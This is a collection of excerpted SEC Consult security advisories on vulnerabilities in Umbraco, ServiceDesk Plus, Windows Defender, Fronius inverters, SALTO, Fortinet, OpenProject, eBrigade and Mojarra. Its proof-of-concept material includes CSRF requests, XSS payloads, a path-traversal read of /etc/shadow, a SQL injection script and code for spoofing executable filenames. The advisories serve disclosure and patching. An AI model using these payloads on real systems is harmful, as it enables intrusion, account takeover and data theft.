SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 > === title: Cross-Site Request Forgery (CSRF) product: Umbraco CMS vulnerable version: version 8.2.2 fixed version: version 8.5 CVE number: CVE-2020-7210 impact: medium homepage: https://umbraco.com/ found: October 2019 by: A. Melnikova (Office Moscow) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best version of Umbraco and a big step forward in regard to making your work with Umbraco simpler; simpler to extend, simpler to edit, simpler to publish - simpler to use, simpler to enjoy." Source: https://umbraco.com/products/umbraco-cms/umbraco-8/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Cross-Site Request Forgery (CSRF) An attacker can use cross-site request forgery to perform arbitrary web requests with the identity of the victim, without being noticed by the victim. This attack always requires some sort of user interaction, usually the victim needs to click on an attacker-prepared link or visit a page under control of the attacker. Due to this, an attacker is able to enable/disable or delete accounts. This may lead to DoS of user accounts. Proof of concept: - 1) Cross-Site Request Forgery (CSRF) In a live attack scenario, the following HTML document would be hosted on a malicious website, controlled by the attacker. Example 1: HTML-code for disabling user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 112 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Set-Cookie: Date: Wed, 06 Nov 2019 10:57:45 GMT Connection: close )]}', {"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"} Example 2: HTML-code for enabling user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 110 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 06 Nov 2019 10:58:12 GMT Connection: close )]}', {"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"} Example 3: HTML-code for deleting user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 114 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Set-Cookie: Date: Wed, 06 Nov 2019 10:58:36 GMT Connection: close )]}', {"notifications":[{"header":"User was deleted","message":"","type":3}],"message":"User was deleted"} As soon as an authenticated victim (admin) visits a website with this HTML code embedded, the payload would get executed in the context of the victim's session. Although responses to these requests are not delivered to the attacker, in many cases it is sufficient to be able to compromise the integrity of the victim's information stored on the site or to perform certain, possibly compromising requests to other sites. Vulnerable / tested versions: - The following version was tested and found to be vulnerable: * version 8.2.2 Vendor contact timeline: 2019-11-13: Contacting vendor through secur...@umbraco.com. 2019-11-13: Requesting encryption keys.
SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 > === title: Reflected XSS product: ZOHO ManageEngine ServiceDeskPlus vulnerable version: <= 11.0 Build 11007 fixed version: 11.0 Build 11010 CVE number: CVE-2020-6843 impact: medium homepage: https://www.manageengine.com/products/service-desk/ found: 2019-12-01 by: Johannes Kruchem (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike." Source: https://www.manageengine.com/products/service-desk/ Business recommendation: The vendor published a patch for ServiceDesk Plus with service pack 11010. It is recommended to install the patch with the included patcher. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Reflected Cross-Site Scripting (CVE-2020-6843) A parameter of the module called "geti18nkey" reflects unfiltered user input if it is changed. The corresponding request is frequently sent in the background if a pre-configured network scan was started. Proof of concept: - 1) Reflected Cross-Site Scripting (CVE-2020-6843) To reproduce the issue visit this URL authenticated as administrator: http://$IP:8080/CustomReportHandler.do?module=geti18nkey= How the parameter was found: 1) Authenticate as administrator and add an IP range in Admin -> Networkscan. 2) Click the "play" button next to the created IP range to start the scan. 3) To check the status of a started network scan frequent requests like "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>" are sent to the server. 4) The value of the "key" parameter will be reflected if you change a single character. The "sdpcsrfparam" isn't needed in order to trigger the XSS. 5) XSS can thus be exploited by calling "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=" Vulnerable / tested versions: - The following versions have been tested which were the latest versions available at the time of the test: - 10.5 - 11.0 Build 11007 Vendor contact timeline: 2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC) Uploaded security advisory to bugbounty.zoho.com 2019-12-09: Vendor promised to fix the vulnerability. 2020-01-08: Reported issue has been fixed in service pack 11010. 2020-01-22: Public release of security advisory. Solution: - The vendor provides an updated version which should be installed immediately. https://www.manageengine.com/products/service-desk/download.html The vendor also provided a link to their readme about the new release: https://www.manageengine.com/products/service-desk/readme.html#11010 Workaround: --- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~
SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 > === title: File Extension Spoofing product: Windows Defender Antivirus vulnerable version: 4.18.1908.7-0 fixed version: Virus Definition Update of 2019/09/30 CVE number: - impact: High homepage: https://www.microsoft.com/de-at/windows/comprehensive-security found: 2019-09-25 by: David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Keep your PC safe with trusted antivirus protection built-in to Windows 10. Windows Defender Antivirus delivers comprehensive, ongoing and real-time protection against software threats like viruses, malware and spyware across email, apps, the cloud and the web." Source: https://www.microsoft.com/de-at/windows/comprehensive-security Business recommendation: Update to the latest version of the Windows Defender Antivirus definitions. Vulnerability overview/description: --- The vulnerability is based on the file extension spoofing method using the RTL unicode character to display a spoofed file extension. This method uses the LTR unicode character, that instructs the following text to be shown in left-to-right order. Lets assume [LTR] is the LTR unicode character, an attacker can use this unicode character to fool a user into believing that a file has a different extension. For example an attacker may name an executable file (.exe) 'spoofed-[LTR]gpj.exe', which would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most important point here is to have the extension you want to be shown in reverse order, since it will be shown right-to-left. Combined with the right file icon, an attacker can imitate an arbitrary file extension. Same goes for other extensions too, like 'xlsx' for a Microsoft Excel Sheet. During testing it happened that 'xlsx' was typed in the wrong order ('xslx' instead of 'xlsx' since reverse order) and Windows Defender Antivirus removed the test file while we tried to execute it. As a result, two files were created, with the exact same executable but with different fake extensions: 1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx') 2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx') The second one was deleted, while the first one could be executed without any problem. Therefore, other extensions related to Microsoft Office were tested as well, but it seems only the xlsx extension had a detection for it. While the security issue of spoofing the file extension by using the RTL unicode character (on RTL systems it is the same just with LTR) is widely known, it seems to be unknown that Microsoft already started to add detection mechanisms for this issue. But since it is not implemented for all extensions and it seems to be implemented in the wrong order, this feature is mostly unknown. Proof of concept: - For the proof of concept a file has to be renamed in Unicode mode using the Unicode character '202E' ('\u202E' in C), which stands for RTL. The sample code is written in C/C++ and uses the unicode API of Windows. A Python PoC has been made as well. C/C++: #include int main(int argc, char** argv) { wchar_t opath[] = L"test.exe"; wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe"; // String for filename 'spoofed-exe.xlsx' wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // String for filename 'spoofed-exe.xslx' // Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' CopyFileW(opath, npath_ok, false); // Copy 'test.exe' to file shown as 'spoofed-exe.xslx' CopyFileW(opath, npath_wrong, false); } Python: from shutil import copyfile opath = "test.exe" npath_ok = "spoofed-\u202Exslx.exe" # String for filename 'spoofed-exe.xlsx' npath_wrong = "spoofed-\u202Exlsx.exe" # String for filename 'spoofed-exe.xslx' # Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' copyfile(opath, npath_ok) # Copy 'test.exe' to file shown as 'spoofed-exe.xslx' copyfile(opath, npath_wrong) There will be two new files after the execution (as long as 'test.exe' exists) and the file shown as 'spoofed-exe.xslx' will be deleted while trying to execute (or earlier) as shown in figure 1. [ win-defender-ext-spoofing1.png ] Figure 1: File gets deleted by Windows Defender Antivirus. But the file shown as 'spoofed-exe.xlsx' will be executed without any problem. [ win-defender-ext-spo
SEC Consult SA-20191203-0 :: Multiple vulnerabilites in Fronius Solar Inverter Series
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 > === title: Multiple vulnerabilites product: Fronius Solar Inverter Series vulnerable version: SW Version <3.14.1 (HM 1.12.1) fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution section below CVE number: CVE-2019-19228, CVE-2019-19229 impact: High homepage: https://www.fronius.com found: 2018-10-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "A passion for new technologies, intensive research and revolutionary solutions have been shaping the Fronius brand since 1945. As the technology leader, we find, develop and implement innovative methods to monitor and control energy for welding technology, photovoltaics and battery charging. We forge new paths, try something difficult and succeed where others have failed in achieving what seems to be impossible. [...]" Source: http://www.fronius.com/en/about-fronius/company-values Business recommendation: The vendor automatically performed a fleet update of the solar inverters in the field in order to patch them. Nevertheless, as not all devices could be reached through such an update, all remaining users are advised to install the patches provided by the vendor immediately. Vulnerability overview/description: --- 1) Unencrypted Communication The whole communication is handled over HTTP. There is no possibility to activate an HTTPS web service. This vulnerability cannot be fixed by the vendor in the current solar inverter generation, see the workaround section below. 2) Authenticated Path Traversal (CVE-2019-19229) A path traversal attack for authenticated users is possible. This allows getting access to the operating system of the device and access information like network configurations and connections to other hosts or potentially other sensitive information. This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5). The web server runs with "nobody" privileges, but nearly all files on the file system are world-readable and can be extracted. This can be seen as another vulnerability but according to the vendor this cannot be fixed in the current solar inverter generation. 3) Backdoor Account (CVE-2019-19228) The web interface has a backdoor user account with the username "today". This user account has all permissions of all other users ("service", "admin" and "user") together. As its name suggests, the password for the user "today" changes every day and seems to be different to other devices with the same firmware. This means that some device-specific strings (e.g. the public device-ID) is mixed up every day to generate a new password. This account is being used by Fronius support in order to access the device upon request from the user. The fix for this issue has been split in two parts. The "password reset" part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the support account needs an architectural rework which will be fixed in a future version (planned for 3.15.1 (HM 1.15.1)). The passwords for all users of the web interface are stored in plain-text. This can be seen as another vulnerability and it has been fixed in version 3.14.1 (HM 1.12.1). 4) Outdated and Vulnerable Software Components Outdated and vulnerable software components were found on the device during a quick examination. Not all of the outdated components can be fixed by the vendor in the current solar inverter generation, see the workaround section below. Proof of concept: - 1) Unencrypted Communication By using an interceptor proxy this vulnerability can be verified in a simple way. 2) Authenticated Path Traversal (CVE-2019-19229) By sending the following request to the following endpoint, a path traversal vulnerability can be triggered: http:///admincgi-bin/service.fcgi Request to read the "/etc/shadow" password file: ┌── |GET /admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow └── As response, the file is returned without line breaks. In this example the line breaks are added for better readability: ┌── |HTTP/1.1 200 OK |Content-Type: appli
SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 > === title: Multiple Critical Vulnerabilities product: SALTO ProAccess SPACE vulnerable version: <= v5.5 fixed version: >= v5.6 CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459, CVE-2019-19460 impact: critical homepage: https://www.saltosystems.com/en/ found: 2019-05-22 by: Werner Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "SALTO ProAccess SPACE Software is a powerful access control management tool that enables you to program access time zones for each user, manage different calendars and obtain audit trails from each door to see who has passed through it. The software includes special functions such as automatic door status changes, anti-passback and relay management. Thanks to its advanced software features, SALTO ProAccess SPACE is also one of the most user-friendly and powerful software products for the access control management of stand-alone wireless devices, and IP online devices in one converged complete access control platform for the user, keys and doors management." Source: http://proaccess-space.saltosystems.com/features/ Business recommendation: The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1. Path Traversal (CVE-2019-19458) Path traversal vulnerabilities allow attackers access to files and directories outside the application root through relative file paths in the user input. During a quick security check, multiple locations in the web application were identified, which allow an attacker to traverse outside of the application root. The vulnerabilities got identified in the "Data Export" as well as "Database Export" functionality. Those vulnerabilities can for example be used to dump the whole database into the web root, by traversing outside of the application root. 2. Arbitrary File Write (CVE-2019-19459) By further exploiting the path traversal vulnerability inside of the "Data Export" feature, an attacker is able to traverse into arbitrary paths and write arbitrary files with arbitrary contents. Some examples are files to the web root, or bat files into auto start. This allows an attacker to execute arbitrary commands on the server. 3. Stored Cross-Site-Scripting (CVE-2019-19457) By adding devices to the SALTO network with a JavaScript payload inside of certain parameters, an attacker is able to permanently embed arbitrary JavaScript payloads inside of the web application. 4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460) The webserver of the SALTO ProAccess SPACE is running as a Windows Service with local SYSTEM permissions per default. This is against the principle of least privilege. An attacker, who is able to exploit the path traversal, or arbitrary file write vulnerability, is basically able to write to every single path on the file system, because the webserver is running with the highest privileges available. 5. Authorization Issues Multiple API calls were identified in the SALTO ProAccess SPACE web application, that could normally only be called by high privileged users. Nevertheless, by directly calling the API with the OAuth token of a low privileged user, it was possible to call some API calls that shouldn't be available to them. 6. Cleartext transmission of sensitive data The SALTO ProAccess SPACE web application allows their users to create so called event streams. Those streams can be used to log events centrally. The stream is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in cleartext and leaks sensitive data such as who opened which door and when including card ids etc. Proof of concept: - 1. Path Traversal (CVE-2019-19458) The "Data Export" as well as the "Database Export" features in SALTO ProAccess SPACE allow users to specify a filename for the different exports. By using special characters inside of the filename, an attacker is able to traverse outside of the designated export path and place the exports in arbitrary locations. For example, the following filename can be used in the database export to store the database backup inside of the webroot: ..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
Hi, we received incorrect version information during the coordination phase thus our initial advisory stated that FortiOS v6.0.7 fixes the issue. Fortinet has just now confirmed that only v6.2.0 includes the patch. See their advisory: https://fortiguard.com/psirt/FG-IR-18-100 SEC Consult Vulnerability Lab On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > > === > title: FortiGuard XOR Encryption > product: Multiple Fortinet Products (see Vulnerable / tested > versions) > vulnerable version: Multiple (see Vulnerable / tested versions) > fixed version: Multiple (see Solution) > CVE number: CVE-2018-9195 > impact: High >homepage: https://www.fortinet.com > found: 2018-05-16 > > by: Stefan Viehböck (Office Vienna) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "From the start, the Fortinet vision has been to deliver broad, truly > integrated, high-performance security across the IT infrastructure. > > We provide top-rated network and content security, as well as secure access > products that share intelligence and work together to form a cooperative > fabric. Our unique security fabric combines Security Processors, an intuitive > operating system, and applied threat intelligence to give you proven security, > exceptional performance, and better visibility and control--while providing > easier administration." > > Source: https://www.fortinet.com/corporate/about-us/about-us.html > > > Business recommendation: > > The vendor provides a patch and users of affected products are urged to > immediately upgrade to the latest version available. > > > Vulnerability overview/description: > --- > Fortinet products, including FortiGate and Forticlient regularly send > information to Fortinet servers (DNS: guard.fortinet.com) on > - UDP ports 53, and > - TCP port 80 (HTTP POST /fgdsvc) > > This cloud communication is used for the FortiGuard Web Filter feature > (https://fortiguard.com/webfilter), > FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) > and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). > > The messages are encrypted using XOR "encryption" with a static key. > > > The protocol messages contain the following types of information: > > **Serial number of the Fortinet product installation** (product type + unique > ID). > This information allows an attacker who can **passively monitor** internet > traffic to: > - learn which Fortinet products and product types an organization uses > (this is valuable for information gathering, see EquationGroup Fortigate > exploits) > - learn which FortiClient installations are part of an organization > - use the FortiClient serial number as a unique identifier to track an > individual as > he/she travels the world > > > **Full HTTP URLs of users web surfing activity** (Web Filter feature). > This information allows an attacker who can **passively monitor** internet > traffic > to spy on users' web surfing activity. In cases where SSL inspection is > enabled, > even the URLs of HTTPS-encrypted communication are sent via this protocol, > effectively breaking the confidentiality of SSL/TLS. > > > **Unspecified email data** (AntiSpam feature). > We do not have any further information on what kind of information is sent by > the > AntiSpam feature. > > > **Unspecified AntiVirus data** (AntiVirus feature). > We do not have any further information on what kind of information is sent by > the > AntiVirus feature. > > > By **intercepting and manipulating** internet traffic an attacker can: > Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus > features. > > > Proof of concept: > - > The following Python 3 script decrypts a FortiGuard message (the static XOR > key > has been removed from this advisory). > > > ```python > from itertools import cycle > > def forti_xor(s1): > xor_key = **removed** > message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key))) > return message > > r1=bytes.f
SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > === title: FortiGuard XOR Encryption product: Multiple Fortinet Products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: Multiple (see Solution) CVE number: CVE-2018-9195 impact: High homepage: https://www.fortinet.com found: 2018-05-16 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Business recommendation: The vendor provides a patch and users of affected products are urged to immediately upgrade to the latest version available. Vulnerability overview/description: --- Fortinet products, including FortiGate and Forticlient regularly send information to Fortinet servers (DNS: guard.fortinet.com) on - UDP ports 53, and - TCP port 80 (HTTP POST /fgdsvc) This cloud communication is used for the FortiGuard Web Filter feature (https://fortiguard.com/webfilter), FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). The messages are encrypted using XOR "encryption" with a static key. The protocol messages contain the following types of information: **Serial number of the Fortinet product installation** (product type + unique ID). This information allows an attacker who can **passively monitor** internet traffic to: - learn which Fortinet products and product types an organization uses (this is valuable for information gathering, see EquationGroup Fortigate exploits) - learn which FortiClient installations are part of an organization - use the FortiClient serial number as a unique identifier to track an individual as he/she travels the world **Full HTTP URLs of users web surfing activity** (Web Filter feature). This information allows an attacker who can **passively monitor** internet traffic to spy on users' web surfing activity. In cases where SSL inspection is enabled, even the URLs of HTTPS-encrypted communication are sent via this protocol, effectively breaking the confidentiality of SSL/TLS. **Unspecified email data** (AntiSpam feature). We do not have any further information on what kind of information is sent by the AntiSpam feature. **Unspecified AntiVirus data** (AntiVirus feature). We do not have any further information on what kind of information is sent by the AntiVirus feature. By **intercepting and manipulating** internet traffic an attacker can: Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus features. Proof of concept: - The following Python 3 script decrypts a FortiGuard message (the static XOR key has been removed from this advisory). ```python from itertools import cycle def forti_xor(s1): xor_key = **removed** message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key))) return message r1=bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f') print(repr(forti_xor(r1))) ``` In this case the encrypted message contents are: '\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...' Another example: '\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00' Vulnerable / tested versions: - The following FortiOS versions are affected according to the vendor: * FortiOS 6.0.6 and below * FortiClientWindows 6.0.6 and below * FortiClientMac 6.2.1 and below The security advisory of the vendor can be found at: https://fortiguard.com/psirt/FG-IR-18-100 Vendor contact timeline: 2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with publi
SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 > === title: Reflected XSS vulnerability product: OpenProject vulnerable version: <= 9.0.3, <=10.0.1 fixed version: 9.0.4, 10.0.2 CVE number: CVE-2019-17092 impact: medium homepage: https://www.openproject.org found: 2019-09-27 by: David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: Update to the latest version of OpenProject. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Reflected XSS vulnerability (CVE-2019-17092) The project list of OpenProject lacks input validation on data that is output inside an error message. Due to the Content Security Policy inline scripts/styles weren't allowed and the script source was limited to 'self'. To bypass this a JavaScript file was added as attachment to an existing project. This could be used to extract the CSRF token and create a new API key. Proof of concept: - 1) Reflected XSS vulnerability (CVE-2019-17092) Within this proof of concept, two steps are done. First the JavaScript code to be executed is uploaded as an attachment to fulfill the Content Security Policy of 'self'. In the second step the uploaded JavaScript code is executed through the reflected XSS vulnerability by using a script-tag. a) Upload JavaScript code An attacker can upload a JavaScript file as attachment into any project in the default configuration. The attachment can be called directly, but will be downloaded automatically. But since the browser doesn't care if a file shall be downloaded or displayed when loading it from an src-property, an attacker can easily use it for the reflected XSS vulnerability. In this proof of concept the following JavaScript code was uploaded: (async () => { var csrf_param = document.querySelector('meta[name=csrf-param]').content; var csrf_token = document.querySelector('meta[name=csrf-token]').content; var req = await fetch("http://$IP/my/generate_api_key;, { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1" }, "referrer": "http://$IP/my/access_token;, "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token), "method": "POST", "mode": "cors" }); var resp = await req.text(); var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm; var api_key = resp.match(regex)[0]; api_key = api_key.slice(35, -9); alert("Generated new API key: " + api_key); })(); This gets the CSRF token and the parameter name (since this seems to be configurable) and sends a request to the generate_api_key functionality. After parsing, the key is exposed in a message box, but can be used for further operations like adding an administrative user. b) Craft link The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the path '/projects'. There an attacker may add any HTML code. Such a link could be: http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]] Vulnerable / tested versions: - The following version has been tested which was the latest version available at the time of the test: * 10.0.0 * 10.0.1 According to the vendor, all versions before v9.0.3 and v10.0.1 are affected. Vendor contact timeline: 2019-10-02: Contacting vendor through secur...@openproject.com 2019-10-02: Vendor verified the vulnerabili
SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 > === title: Multiple SQL Injection vulnerabilities product: eBrigade vulnerable version: <5.0 fixed version: >=5.0 CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745 impact: critical homepage: https://ebrigade.net found: 2019-06-06 by: D. Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "eBrigade is a web application that allows the management of personnel, vehicles and equipment of rescue centers (fire brigades), associations of first responders and military organizations. Highly configurable, eBrigade can meet the expectations of many other organizations. Skills management, generation of the cover sheet according to availability. Management of the interventions and the victims with assessment sheets rescuers. Private social network. Notifications and alerts by email and SMS. Accounting, reporting and numerous graphs allow precise monitoring of the organization." (translated) Source: https://ebrigade.net/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Multiple SQL Injection vulnerabilities Due to insufficient sanitization of user input an authenticated attacker can execute arbitrary SQL code in several SELECT statements. Since two of the three vulnerabilities are completely unsanitized and responsible to serve ICAL files, an attacker can let a user download manipulated calendar files. Besides that an attacker can also dump the whole database. The third vulnerability results out of wrong usage of sanitization functions. This enables an attacker to manipulate the SQL query with specially crafted requests resulting into a blind SQL injection, as described in one of the following vulnerabilities. a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744) The parameters of two links can be manipulated so any arbitrary query to any table or database can be added to the output of the resulting calendar files using the UNION functionality of SQL. c) Boolean-based Blind SQL Injection (CVE-2019-16745) The parameters of a search result can be manipulated to guess the returned values of an arbitrary query. Proof of concept: - 1) Multiple SQL Injection vulnerabilities All vulnerabilities were tested with an authenticated user with the lowest access rights (public). The whole PoC script requires an authenticated user for any functionality. The user is authenticated by a PHP session using the cookie PHPSESSID (may vary at different webservers). In conclusion, every request described below requires the PHP session cookie. a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743) The script evenement_ical.php uses the unsanitized parameter "evenement" to query the database. The results are written into a downloadable calendar file. By adding a UNION statement, an attacker can extend the output with arbitrary data of the database: The user input is read on line 42: $evenement=(isset($_GET['evenement'])?$_GET['evenement']:""); On line 88-89 it is added to the SQL statement: if ($evenement !="") $sql .= "\n and e.e_code = $evenement "; Which is executed and fetched in line 136 and 138: $res = mysqli_query($dbc,$sql); while($row=mysqli_fetch_array($res)){ Since e_code is of type integer, the proper sanitization method would be intval(). POC URL: evenement_ical.php?evenement=1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14-- -> Version after 'LOCATION:' POC in Python: import requests import string import re url = input("URL without file (i.e. https://localhost/ebrigade): ") phpsession = input("PHPSESSID: ") cookies = {'PHPSESSID': phpsession} payload = '+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14--' print("Testing vulnerability") r = requests.get('{0}/evenement_ical.php?evenement=1{1}'.format(url, payload), cookies=cookies) matches = re.findall( r'^LOCATION:(.*)$', r.text, flags=re.MULTILINE) print("Found version: {0}".format(matches[-1])) b) UNION SQL Injection in evenements.php (CVE-2019-16744) The script evenements.php uses the unsanitized para
SEC Consult SA-20190918-0 :: Reflected Cross-Site Scripting (XSS) in Oracle Mojarra JSF
SEC Consult Vulnerability Lab Security Advisory < 20190918-0 > === title: Reflected Cross-Site Scripting (XSS) product: Oracle Mojarra JSF included in Java EE 7 Eclipse Mojarra JSF vulnerable version: 2.2 & 2.3 fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING https://github.com/eclipse-ee4j/mojarra CVE number: - impact: Medium homepage: https://javaserverfaces.github.io/ found: 2018-11-12 by: Jean-Benjamin Rousseau (Office Zurich) Guillaume Crouquet (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "JavaServer Faces technology simplifies building user interfaces for JavaServer applications. Developers can build web applications by assembling reuseable UI components in a page; connecting these components to an application data source; and wiring client-generated events to server-side event handlers. This project provides information on the continued development of the JavaServer Faces specification. JavaServer Faces (JSF) is a JCP Standard technology for authoring component based user interfaces on the Java EE platform." Source: 